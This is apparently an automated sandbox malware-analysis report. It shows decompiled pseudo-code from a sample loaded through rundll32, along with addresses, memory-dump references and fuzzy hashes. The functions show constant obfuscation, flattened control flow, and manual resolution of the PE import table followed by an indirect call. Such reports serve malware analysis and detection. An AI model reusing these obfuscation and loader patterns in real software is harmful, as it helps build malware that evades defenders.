								E007AE274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
								_t155 =  ==  ? 1 : _t155;
							}
						}
						L5:
						return _t155;
					}
					_push( *_t154);
					_t130 = E007AAE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
					_t162 = _t162 + 0x14;
					if(_t130 == 0) {
						_t137 = 0xeaa5f76;
						goto L10;
					} else {
						_t137 = 0xfe1ef29;
						continue;
					}
					goto L5;
					L10:
				} while (_t137 != 0xeaa5f76);
				goto L5;
			}



























                                                                                                                          0x0079aeff
                                                                                                                          0x0079af06
                                                                                                                          0x0079af0a
                                                                                                                          0x0079af0c
                                                                                                                          0x0079af0d
                                                                                                                          0x0079af11
                                                                                                                          0x0079af15
                                                                                                                          0x0079af16
                                                                                                                          0x0079af17
                                                                                                                          0x0079af1c
                                                                                                                          0x0079af24
                                                                                                                          0x0079af27
                                                                                                                          0x0079af31
                                                                                                                          0x0079af39
                                                                                                                          0x0079af3b
                                                                                                                          0x0079af43
                                                                                                                          0x0079af48
                                                                                                                          0x0079af4d
                                                                                                                          0x0079af58
                                                                                                                          0x0079af5d
                                                                                                                          0x0079af63
                                                                                                                          0x0079af6b
                                                                                                                          0x0079af73
                                                                                                                          0x0079af7d
                                                                                                                          0x0079af80
                                                                                                                          0x0079af84
                                                                                                                          0x0079af8c
                                                                                                                          0x0079af94
                                                                                                                          0x0079afa4
                                                                                                                          0x0079afad
                                                                                                                          0x0079afb0
                                                                                                                          0x0079afb4
                                                                                                                          0x0079afbc
                                                                                                                          0x0079afc4
                                                                                                                          0x0079afc9
                                                                                                                          0x0079afd9
                                                                                                                          0x0079afdd
                                                                                                                          0x0079afe5
                                                                                                                          0x0079afed
                                                                                                                          0x0079aff5
                                                                                                                          0x0079affe
                                                                                                                          0x0079b001
                                                                                                                          0x0079b005
                                                                                                                          0x0079b00d
                                                                                                                          0x0079b015
                                                                                                                          0x0079b01d
                                                                                                                          0x0079b025
                                                                                                                          0x0079b02d
                                                                                                                          0x0079b035
                                                                                                                          0x0079b03a
                                                                                                                          0x0079b042
                                                                                                                          0x0079b04a
                                                                                                                          0x0079b054
                                                                                                                          0x0079b058
                                                                                                                          0x0079b060
                                                                                                                          0x0079b06d
                                                                                                                          0x0079b071
                                                                                                                          0x0079b076
                                                                                                                          0x0079b083
                                                                                                                          0x0079b08b
                                                                                                                          0x0079b093
                                                                                                                          0x0079b09b
                                                                                                                          0x0079b09b
                                                                                                                          0x0079b0a5
                                                                                                                          0x0079b101
                                                                                                                          0x00000000
                                                                                                                          0x0079b0a7
                                                                                                                          0x0079b0ad
                                                                                                                          0x00000000
                                                                                                                          0x0079b0b3
                                                                                                                          0x0079b0bc
                                                                                                                          0x0079b0e3
                                                                                                                          0x0079b0f4
                                                                                                                          0x0079b0f4
                                                                                                                          0x0079b0ad
                                                                                                                          0x0079b0f8
                                                                                                                          0x0079b100
                                                                                                                          0x0079b100
                                                                                                                          0x0079b105
                                                                                                                          0x0079b11b
                                                                                                                          0x0079b120
                                                                                                                          0x0079b125
                                                                                                                          0x0079b131
                                                                                                                          0x00000000
                                                                                                                          0x0079b127
                                                                                                                          0x0079b127
                                                                                                                          0x00000000
                                                                                                                          0x0079b127
                                                                                                                          0x00000000
                                                                                                                          0x0079b136
                                                                                                                          0x0079b136
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: #@Z$_`
                                                                                                                          • API String ID: 0-2586238014
                                                                                                                          • Opcode ID: b38fba96cb4994416876df78d37f49d554c2d1e816f6aa298b51c6517f82fd39
                                                                                                                          • Instruction ID: 5ae6d993d8c592ba6dac55d9076bed13d2447e040c8f8141436c993973b2f4a5
                                                                                                                          • Opcode Fuzzy Hash: b38fba96cb4994416876df78d37f49d554c2d1e816f6aa298b51c6517f82fd39
                                                                                                                          • Instruction Fuzzy Hash: E95135721083009FCB18CF26D88A81BBBE1FBD8758F549A1DF59696260C376CA49CF47
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079DFF3 Relevance: 2.6, Strings: 2, Instructions: 135COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E0079DFF3() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t128;
				intOrPtr _t131;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t143;
				void* _t146;
				signed int* _t148;

				_t148 =  &_v52;
				_v12 = 0xa1a716;
				_v12 = _v12 + 0x2188;
				_v12 = _v12 ^ 0x00a02056;
				_v32 = 0x472a3;
				_v32 = _v32 + 0x22e5;
				_v32 = _v32 ^ 0xff9fab52;
				_v32 = _v32 ^ 0xff9c5b0a;
				_v48 = 0x9a7516;
				_v48 = _v48 + 0xffff4702;
				_v48 = _v48 * 0x45;
				_v48 = _v48 + 0xffff2ff5;
				_t146 = 0x4903f33;
				_v48 = _v48 ^ 0x296ff1ed;
				_v16 = 0xfa3b71;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xf47f6bba;
				_v20 = 0xc0b9b;
				_t133 = 0x7b;
				_v20 = _v20 * 0x52;
				_v20 = _v20 ^ 0x03d2ca7d;
				_v36 = 0x400b3e;
				_v36 = _v36 ^ 0xba288636;
				_v36 = _v36 ^ 0xc4c376ba;
				_v36 = _v36 ^ 0x7eaacb92;
				_v52 = 0x3419b2;
				_v52 = _v52 / _t133;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 | 0xcef26f8a;
				_v52 = _v52 ^ 0xcef1d6cf;
				_v4 = 0xb26f64;
				_t134 = 3;
				_v4 = _v4 / _t134;
				_v4 = _v4 ^ 0x003ff5cc;
				_v40 = 0x34a33d;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0xd21b54bd;
				_v40 = _v40 ^ 0x33ae4ce0;
				_v40 = _v40 ^ 0xe1b00bb7;
				_v8 = 0x4c76b4;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x013e4034;
				_v24 = 0x1c9e42;
				_v24 = _v24 ^ 0x4f10b4b5;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0xf0cd9088;
				_v44 = 0xfe69b1;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 * 0x49;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 ^ 0x011db47c;
				_v28 = 0x46ec28;
				_v28 = _v28 << 9;
				_v28 = _v28 * 0x58;
				_v28 = _v28 ^ 0xc2551a85;
				_t135 =  *0x7b3e0c; // 0x0
				do {
					while(_t146 != 0x4903f33) {
						if(_t146 == 0x6f617aa) {
							_t128 = E007946BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E007981B7, _v28);
							_t135 =  *0x7b3e0c; // 0x0
							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
						} else {
							if(_t146 != 0xc69f0b3) {
								goto L6;
							} else {
								_t131 = E00797AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
								_t135 =  *0x7b3e0c; // 0x0
								_t148 =  &(_t148[6]);
								_t146 = 0x6f617aa;
								 *((intOrPtr*)(_t135 + 8)) = _t131;
								continue;
							}
						}
						L9:
						return 0 | _t135 != 0x00000000;
					}
					_push(_t135);
					_push(_t135);
					_t143 = 0x24;
					_t135 = E00797FF2(_t143);
					_t146 = 0xc69f0b3;
					 *0x7b3e0c = _t135;
					L6:
				} while (_t146 != 0xab42793);
				goto L9;
			}
























                                                                                                                          0x0079dff3
                                                                                                                          0x0079dff6
                                                                                                                          0x0079e000
                                                                                                                          0x0079e008
                                                                                                                          0x0079e010
                                                                                                                          0x0079e018
                                                                                                                          0x0079e020
                                                                                                                          0x0079e028
                                                                                                                          0x0079e030
                                                                                                                          0x0079e038
                                                                                                                          0x0079e049
                                                                                                                          0x0079e052
                                                                                                                          0x0079e05a
                                                                                                                          0x0079e05c
                                                                                                                          0x0079e069
                                                                                                                          0x0079e076
                                                                                                                          0x0079e07b
                                                                                                                          0x0079e083
                                                                                                                          0x0079e092
                                                                                                                          0x0079e095
                                                                                                                          0x0079e099
                                                                                                                          0x0079e0a1
                                                                                                                          0x0079e0a9
                                                                                                                          0x0079e0b1
                                                                                                                          0x0079e0b9
                                                                                                                          0x0079e0c1
                                                                                                                          0x0079e0d1
                                                                                                                          0x0079e0d5
                                                                                                                          0x0079e0da
                                                                                                                          0x0079e0e2
                                                                                                                          0x0079e0ea
                                                                                                                          0x0079e0f6
                                                                                                                          0x0079e0f9
                                                                                                                          0x0079e0fd
                                                                                                                          0x0079e105
                                                                                                                          0x0079e10d
                                                                                                                          0x0079e112
                                                                                                                          0x0079e11a
                                                                                                                          0x0079e122
                                                                                                                          0x0079e12a
                                                                                                                          0x0079e132
                                                                                                                          0x0079e137
                                                                                                                          0x0079e13f
                                                                                                                          0x0079e147
                                                                                                                          0x0079e14f
                                                                                                                          0x0079e154
                                                                                                                          0x0079e15c
                                                                                                                          0x0079e164
                                                                                                                          0x0079e16e
                                                                                                                          0x0079e177
                                                                                                                          0x0079e17b
                                                                                                                          0x0079e183
                                                                                                                          0x0079e18b
                                                                                                                          0x0079e195
                                                                                                                          0x0079e199
                                                                                                                          0x0079e1a1
                                                                                                                          0x0079e1a7
                                                                                                                          0x0079e1a7
                                                                                                                          0x0079e1ad
                                                                                                                          0x0079e229
                                                                                                                          0x0079e22e
                                                                                                                          0x0079e237
                                                                                                                          0x0079e1af
                                                                                                                          0x0079e1b1
                                                                                                                          0x00000000
                                                                                                                          0x0079e1b3
                                                                                                                          0x0079e1c6
                                                                                                                          0x0079e1cb
                                                                                                                          0x0079e1d1
                                                                                                                          0x0079e1d4
                                                                                                                          0x0079e1d6
                                                                                                                          0x00000000
                                                                                                                          0x0079e1d6
                                                                                                                          0x0079e1b1
                                                                                                                          0x0079e23b
                                                                                                                          0x0079e248
                                                                                                                          0x0079e248
                                                                                                                          0x0079e1e7
                                                                                                                          0x0079e1e8
                                                                                                                          0x0079e1eb
                                                                                                                          0x0079e1f3
                                                                                                                          0x0079e1f5
                                                                                                                          0x0079e1f7
                                                                                                                          0x0079e1fd
                                                                                                                          0x0079e1fd
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (F$"
                                                                                                                          • API String ID: 0-1034852068
                                                                                                                          • Opcode ID: ecdf6594877d7cba06e3d6748a117bc233c486364c9e36d44b2b5a47d6ffc6d7
                                                                                                                          • Instruction ID: d87d2bdd8d543cd974dc65808c2ec2900bb8d8e22054ba53f287334d933bbb07
                                                                                                                          • Opcode Fuzzy Hash: ecdf6594877d7cba06e3d6748a117bc233c486364c9e36d44b2b5a47d6ffc6d7
                                                                                                                          • Instruction Fuzzy Hash: 3A5144714093019FC758CF25E58A80FBBE1EB84758F108A1EF595AA260D3B5DA49CF87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00797C37 Relevance: 2.6, Strings: 2, Instructions: 122COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E00797C37(void* __ecx, void* __edx) {
				void* _t91;
				void* _t102;
				signed short _t108;
				signed short _t111;
				signed short _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed short _t121;
				intOrPtr _t128;
				signed short* _t132;
				signed short _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t136;

				_t134 =  *((intOrPtr*)(_t135 + 0x30));
				_push(_t134);
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t91);
				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
				_t136 = _t135 + 0x14;
				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
				_t115 = 0x47;
				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
				 *(_t136 + 0x28) = 0x411077;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
				 *(_t136 + 0x14) = 0x6ab109;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
				 *(_t136 + 0x3c) = 0x583f0;
				_t116 = 0x13;
				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
				 *(_t136 + 0x28) = 0xeb6063;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
				 *(_t136 + 0x20) = 0x8f08a1;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
				 *(_t136 + 0x1c) = 0x46d0e7;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
				 *(_t136 + 0x14) = 0x9e0f5b;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
				_t117 =  *(_t136 + 0x18);
				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t133 = _t128 + _t134;
					while(1) {
						_t105 =  *((intOrPtr*)(_t133 + 0xc));
						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
							goto L13;
						}
						_t121 = E007ACADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
						 *(_t136 + 0x18) = _t121;
						__eflags = _t121;
						if(_t121 == 0) {
							L15:
							return 0;
						}
						_t132 =  *_t133 + _t134;
						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
						while(1) {
							_t108 =  *_t132;
							__eflags = _t108;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t110 = _t108 + 2 + _t134;
								__eflags = _t108 + 2 + _t134;
							} else {
								_t110 = _t108 & 0x0000ffff;
							}
							_t111 = E00796CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
							_t136 = _t136 + 0x10;
							__eflags = _t111;
							if(_t111 == 0) {
								goto L15;
							} else {
								_t121 =  *(_t136 + 0x18);
								_t132 =  &(_t132[2]);
								 *_t113 = _t111;
								_t113 = _t113 + 4;
								__eflags = _t113;
								continue;
							}
						}
						_t133 = _t133 + 0x14;
						__eflags = _t133;
					}
					goto L13;
				}
			}


















                                                                                                                          0x00797c3c
                                                                                                                          0x00797c42
                                                                                                                          0x00797c43
                                                                                                                          0x00797c47
                                                                                                                          0x00797c4b
                                                                                                                          0x00797c4c
                                                                                                                          0x00797c4d
                                                                                                                          0x00797c52
                                                                                                                          0x00797c5a
                                                                                                                          0x00797c5d
                                                                                                                          0x00797c6e
                                                                                                                          0x00797c71
                                                                                                                          0x00797c75
                                                                                                                          0x00797c7d
                                                                                                                          0x00797c8d
                                                                                                                          0x00797c91
                                                                                                                          0x00797c99
                                                                                                                          0x00797ca1
                                                                                                                          0x00797ca9
                                                                                                                          0x00797cb1
                                                                                                                          0x00797cb9
                                                                                                                          0x00797cc1
                                                                                                                          0x00797ccd
                                                                                                                          0x00797cd0
                                                                                                                          0x00797cd4
                                                                                                                          0x00797ce1
                                                                                                                          0x00797ce5
                                                                                                                          0x00797ced
                                                                                                                          0x00797cf5
                                                                                                                          0x00797cfa
                                                                                                                          0x00797d02
                                                                                                                          0x00797d0a
                                                                                                                          0x00797d12
                                                                                                                          0x00797d17
                                                                                                                          0x00797d1f
                                                                                                                          0x00797d27
                                                                                                                          0x00797d31
                                                                                                                          0x00797d35
                                                                                                                          0x00797d3d
                                                                                                                          0x00797d4a
                                                                                                                          0x00797d4e
                                                                                                                          0x00797d56
                                                                                                                          0x00797d5b
                                                                                                                          0x00797d66
                                                                                                                          0x00797d6a
                                                                                                                          0x00797d6c
                                                                                                                          0x00797d72
                                                                                                                          0x00797df1
                                                                                                                          0x00000000
                                                                                                                          0x00797d7b
                                                                                                                          0x00797d7b
                                                                                                                          0x00797dea
                                                                                                                          0x00797dea
                                                                                                                          0x00797def
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00797d96
                                                                                                                          0x00797d98
                                                                                                                          0x00797d9c
                                                                                                                          0x00797d9e
                                                                                                                          0x00797dfc
                                                                                                                          0x00000000
                                                                                                                          0x00797dfc
                                                                                                                          0x00797da5
                                                                                                                          0x00797da7
                                                                                                                          0x00797de1
                                                                                                                          0x00797de1
                                                                                                                          0x00797de3
                                                                                                                          0x00797de5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00797dab
                                                                                                                          0x00797db5
                                                                                                                          0x00797db5
                                                                                                                          0x00797dad
                                                                                                                          0x00797dad
                                                                                                                          0x00797dad
                                                                                                                          0x00797dc9
                                                                                                                          0x00797dce
                                                                                                                          0x00797dd1
                                                                                                                          0x00797dd3
                                                                                                                          0x00000000
                                                                                                                          0x00797dd5
                                                                                                                          0x00797dd5
                                                                                                                          0x00797dd9
                                                                                                                          0x00797ddc
                                                                                                                          0x00797dde
                                                                                                                          0x00797dde
                                                                                                                          0x00000000
                                                                                                                          0x00797dde
                                                                                                                          0x00797dd3
                                                                                                                          0x00797de7
                                                                                                                          0x00797de7
                                                                                                                          0x00797de7
                                                                                                                          0x00000000
                                                                                                                          0x00797dea

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: X^wE$c`
                                                                                                                          • API String ID: 0-1321574684
                                                                                                                          • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                          • Instruction ID: f3ab49104a096e279b235528dfbe0f772db6c94ac4290374ce3102b98cf54911
                                                                                                                          • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                          • Instruction Fuzzy Hash: 9B5186716083029FCB18DF24E88692BBBE1FFC4358F10481DF48696221E375DA48CF92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00794C5D Relevance: 2.6, Strings: 2, Instructions: 98COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 62%
                                                                                                                          			E00794C5D(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _t106;
				void* _t108;
				intOrPtr* _t109;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t128;

				_v44 = _v44 & 0x00000000;
				_v48 = 0xad4f7a;
				_v16 = 0xf18dbd;
				_v16 = _v16 + 0xffff4795;
				_v16 = _v16 << 0xe;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00dff17e;
				_v12 = 0xaf5949;
				_v12 = _v12 | 0xe2d389df;
				_v12 = _v12 + 0x286;
				_t112 = 3;
				_v12 = _v12 / _t112;
				_v12 = _v12 ^ 0x4ba32b72;
				_v24 = 0x2aefd1;
				_t113 = 0x7d;
				_t128 = _a4;
				_v24 = _v24 * 0x59;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x3bb9ca43;
				_v8 = 0x985427;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x713a2c3c;
				_v8 = _v8 | 0x45eb1ca3;
				_v8 = _v8 ^ 0x77f5f6d4;
				_v28 = 0xa7f2b4;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 + 0x7e4a;
				_v28 = _v28 ^ 0x000cc7a8;
				_v40 = 0x7087c6;
				_t114 = 0x69;
				_v40 = _v40 / _t113;
				_v40 = _v40 ^ 0x00014835;
				_v20 = 0xcde00b;
				_v20 = _v20 + 0xffffcf30;
				_v20 = _v20 | 0xcdf6f1c4;
				_v20 = _v20 + 0xfc2b;
				_v20 = _v20 ^ 0xce0272c5;
				_v36 = 0x30875a;
				_v36 = _v36 * 0x47;
				_v36 = _v36 / _t114;
				_v36 = _v36 ^ 0x0028facf;
				_v32 = 0x6c449b;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 + 0xffff12fc;
				_v32 = _v32 ^ 0xfff19483;
				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
				_t134 = _t106;
				if(_t106 != 0) {
					_push(_v8);
					_push(_v24);
					_push(_v12);
					_t108 = E007A8606(_v16, 0x791378, _t134);
					_push(_v20);
					_t130 = _t108;
					_push(_t108);
					_push(_v40);
					_t109 = E0079CBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
					if(_t109 != 0) {
						 *_t109();
					}
					E0079A8B0(_v36, _t130, _v32);
				}
				return 0;
			}





















                                                                                                                          0x00794c63
                                                                                                                          0x00794c69
                                                                                                                          0x00794c70
                                                                                                                          0x00794c77
                                                                                                                          0x00794c7e
                                                                                                                          0x00794c82
                                                                                                                          0x00794c86
                                                                                                                          0x00794c8d
                                                                                                                          0x00794c94
                                                                                                                          0x00794c9b
                                                                                                                          0x00794ca8
                                                                                                                          0x00794cad
                                                                                                                          0x00794cb2
                                                                                                                          0x00794cb9
                                                                                                                          0x00794cc4
                                                                                                                          0x00794cc7
                                                                                                                          0x00794cca
                                                                                                                          0x00794ccd
                                                                                                                          0x00794cd1
                                                                                                                          0x00794cd8
                                                                                                                          0x00794cdf
                                                                                                                          0x00794ce3
                                                                                                                          0x00794cea
                                                                                                                          0x00794cf1
                                                                                                                          0x00794cf8
                                                                                                                          0x00794cff
                                                                                                                          0x00794d03
                                                                                                                          0x00794d0a
                                                                                                                          0x00794d11
                                                                                                                          0x00794d1d
                                                                                                                          0x00794d1e
                                                                                                                          0x00794d23
                                                                                                                          0x00794d2a
                                                                                                                          0x00794d31
                                                                                                                          0x00794d38
                                                                                                                          0x00794d3f
                                                                                                                          0x00794d46
                                                                                                                          0x00794d4d
                                                                                                                          0x00794d5c
                                                                                                                          0x00794d64
                                                                                                                          0x00794d67
                                                                                                                          0x00794d6e
                                                                                                                          0x00794d75
                                                                                                                          0x00794d79
                                                                                                                          0x00794d80
                                                                                                                          0x00794d8a
                                                                                                                          0x00794d8d
                                                                                                                          0x00794d8f
                                                                                                                          0x00794d92
                                                                                                                          0x00794d9a
                                                                                                                          0x00794d9d
                                                                                                                          0x00794da3
                                                                                                                          0x00794da8
                                                                                                                          0x00794dab
                                                                                                                          0x00794dad
                                                                                                                          0x00794dae
                                                                                                                          0x00794db7
                                                                                                                          0x00794dc1
                                                                                                                          0x00794dc3
                                                                                                                          0x00794dc3
                                                                                                                          0x00794dcd
                                                                                                                          0x00794dd3
                                                                                                                          0x00794dda

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: <,:q$J~
                                                                                                                          • API String ID: 0-951887683
                                                                                                                          • Opcode ID: ab4e2e9656927a58004d355011aaf343a0fb4b531af89c21cd6ec765053635f1
                                                                                                                          • Instruction ID: 4272f423a46f1d1a07357b8689992901e8643d78b942dfef8fa5502dcaea34a2
                                                                                                                          • Opcode Fuzzy Hash: ab4e2e9656927a58004d355011aaf343a0fb4b531af89c21cd6ec765053635f1
                                                                                                                          • Instruction Fuzzy Hash: 0B411F71D0130AEBDF08CFA1D94A9EEBBB1FB54314F208159D510BA2A0D7B90B55CFA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079EE81 Relevance: 2.6, Strings: 2, Instructions: 95COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0079EE81(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				short _v48;
				short _v52;
				intOrPtr _v56;
				char _v576;
				intOrPtr* _t95;
				signed int _t99;
				signed int _t100;

				_v56 = 0x3b8b1c;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_v8 = 0xf9e323;
				_v8 = _v8 ^ 0x73816ffa;
				_v8 = _v8 + 0x5b26;
				_v8 = _v8 ^ 0x387262e7;
				_v8 = _v8 ^ 0x4b076809;
				_v20 = 0x75aab0;
				_v20 = _v20 ^ 0xc40c30fa;
				_v20 = _v20 + 0x78e9;
				_v20 = _v20 ^ 0xc4737271;
				_v16 = 0xa8e87a;
				_v16 = _v16 + 0xffff799a;
				_t99 = 0x33;
				_v16 = _v16 / _t99;
				_v16 = _v16 ^ 0x000fed3f;
				_v28 = 0x7feeb5;
				_v28 = _v28 + 0xffffe4f6;
				_v28 = _v28 ^ 0x007d0c9c;
				_v32 = 0x59c916;
				_t100 = 0x5d;
				_v32 = _v32 / _t100;
				_v32 = _v32 ^ 0x000d1fec;
				_v12 = 0x866588;
				_v12 = _v12 ^ 0x68ade4cb;
				_v12 = _v12 + 0xffffbaa5;
				_v12 = _v12 ^ 0x68223e43;
				_v36 = 0xbafac2;
				_v36 = _v36 ^ 0x5e34b155;
				_v36 = _v36 ^ 0x5e8c811c;
				_v24 = 0xc770cb;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x95635bf4;
				_v24 = _v24 ^ 0x956359d7;
				_v40 = 0xbd0b83;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x001e2563;
				_t101 = _v8;
				if(E007A8F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
					_t95 =  &_v576;
					if(_v576 != 0) {
						while( *_t95 != 0x5c) {
							_t95 = _t95 + 2;
							if( *_t95 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
